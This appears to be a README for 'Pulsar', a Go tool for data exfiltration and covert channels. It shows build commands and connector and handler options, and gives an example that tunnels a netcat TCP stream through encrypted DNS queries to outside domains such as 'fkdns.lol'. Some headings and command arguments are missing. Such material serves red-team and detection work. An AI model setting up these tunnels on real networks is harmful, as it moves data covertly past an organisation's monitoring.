Pulsar is a tool for data exfiltration and covert communication that enable you to create a secure data transfer, a bizarre chat or a network tunnel through different protocols, for example you can receive data from tcp connection and resend it to real destination through DNS packets 

Setting up Pulsar

First, getting the code from repository and compile it with following command:

$ cd pulsar
$ export GOPATH=$(shell pwd)
$ go get golang.org/x/net/icmp
$ go build -o bin/pulsar src/main.go

or run:

$ make


A connector is a simple channel to the external world, with the connector you can read and write data from different sources.

  • Console:
    • Default in/out connector, read data from stdin and write to stdout
  • TCP
    • Read and write data through tcp connections



  • Read and write data through udp packet



  • Read and write data through icmp packet

icmp: (the connection port is obviously useless)

You can use option –in in order to select input connector and option –out to select output connector:

–in tcp:
–out dns:fkdns.lol:


A handler allows you to change data in transit, you can combine handlers arbitrarily.

  • Stub:
    • Default, do nothing, pass through
  • Base32
    • Base32 encoder/decoder

–handlers base32

You can use the –decode option to use ALL handlers in decoding mode

–handlers base64,base32,base64,cipher:key –decode


In the following example Pulsar will be used to create a secure two-way tunnel on DNS protocol, data will be read from TCP connection (simple nc client) and resend encrypted through the tunnel.

[nc 9000] <–TCP–> [pulsar] <–DNS–> [pulsar] <–TCP–> [nc -l -p 9900]

$ ./pulsar –in tcp: –out dns:test.org@ –duplex –plain in –handlers ‘cipher:supersekretkey!!’
$ nc 9000

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